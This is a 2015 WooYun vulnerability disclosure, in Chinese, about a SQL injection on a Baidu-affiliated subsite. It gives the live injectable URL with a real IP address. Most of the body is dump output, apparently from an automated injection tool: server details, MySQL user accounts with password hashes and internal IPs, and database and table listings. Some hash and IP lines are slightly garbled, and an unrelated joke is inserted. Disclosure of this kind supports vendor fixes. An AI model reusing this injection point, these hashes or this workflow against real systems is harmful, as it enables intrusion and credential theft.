缺陷编号:WooYun-2015-0125580
漏洞标题:百度旗下某业务子站SQL注入漏洞
相关厂商:百度
漏洞作者:xy小雨
提交时间:2015-07-09 11:12
公开时间:2015-08-23 14:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开
一天小姨子来我家,刚好家里买了点香蕉,便问她要不要,小姨子说,不用不用。我:给你吃的,不是给你用的!顿时家里安静了...
http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1%27路径
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
Target: http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1<br> Host IP: 42.62.39.206<br>Web Server: Apache<br>Powered-by: PHP/5.2.6<br>DB Server: MySQL time based<br> Resp. Time(avg): 275 ms<br>Current User: [email protected]<br>Sql Version: 5.1.73-log<br>Current DB: baikan<br>System User: [email protected]<br>Host Name: localhost.localdomain<br>Installation dir: /usr/local/mysql/<br>DB User & Pass: root::localhost<br> root::localhost.localdomain<br> root::127.0.0.1<br> ::localhost<br> ::localhost.localdomain<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.165<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.166<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.167<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.168<br> wap:*47F5587D14973816A255AB6698096D0D1DDBE6AD:118.144.95.169<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:localhost<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:118.144.95.152<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.128<br> wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:11.11.0.129<br> wap:*47F5587D14973816A2C4AB6698096D0D1DDBE6AD:1/.11.0.130<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBA6AD:11.11.0.131<br> wap:*47F5587D14973816A2C5AB6698096D0D1DDBE6AD:11.11.0.132<br>Data Bases: information_schema<br> baikan<br> mysql<br> test |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
Database: test<br> [1 table]<br> +---------------------------------------+<br> | te |<br> +---------------------------------------+Database: baikan<br> [21 tables]<br> +---------------------------------------+<br> | admin_user |<br> | baikan_psort |<br> | baikan_saomiao_block_log |<br> | baikan_saomiao_keyword_log |<br> | baikan_sort |<br> | channel_bookorder_duoku |<br> | channel_bookorder_duokubak |<br> | cmread_book_info |<br> | global_level |<br> | wap_advertisement |<br> | wap_advertposition |<br> | wap_block |<br> | wap_blockbooks |<br> | wap_blockchildren |<br> | wap_cooperater |<br> | wap_cpbooks |<br> | wap_feedback |<br> | wap_keyword |<br> | wap_keywordposition |<br> | wap_page |<br> | wap_page_block |<br> +---------------------------------------+Database: information_schema<br> [28 tables]<br> +---------------------------------------+<br> | CHARACTER_SETS |<br> | COLLATIONS |<br> | COLLATION_CHARACTER_SET_APPLICABILITY |<br> | COLUMNS |<br> | COLUMN_PRIVILEGES |<br> | ENGINES |<br> | EVENTS |<br> | FILES |<br> | GLOBAL_STATUS |<br> | GLOBAL_VARIABLES |<br> | KEY_COLUMN_USAGE |<br> | PARTITIONS |<br> | PLUGINS |<br> | PROCESSLIST |<br> | PROFILING |<br> | REFERENTIAL_CONSTRAINTS |<br> | ROUTINES |<br> | SCHEMATA |<br> | SCHEMA_PRIVILEGES |<br> | SESSION_STATUS |<br> | SESSION_VARIABLES |<br> | STATISTICS |<br> | TABLES |<br> | TABLE_CONSTRAINTS |<br> | TABLE_PRIVILEGES |<br> | TRIGGERS |<br> | USER_PRIVILEGES |<br> | VIEWS |<br> +---------------------------------------+Database: mysql<br> [23 tables]<br> +---------------------------------------+<br> | user |<br> | columns_priv |<br> | db |<br> | event |<br> | func |<br> | general_log |<br> | help_category |<br> | help_keyword |<br> | help_relation |<br> | help_topic |<br> | host |<br> | ndb_binlog_index |<br> | plugin |<br> | proc |<br> | procs_priv |<br> | servers |<br> | slow_log |<br> | tables_priv |<br> | time_zone |<br> | time_zone_leap_second |<br> | time_zone_name |<br> | time_zone_transition |<br> | time_zone_transition_type |<br> +---------------------------------------+ |
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-07-0914:19
感谢
暂无
0.0
原文连接
的情况下转载,若非则不得使用我方内容。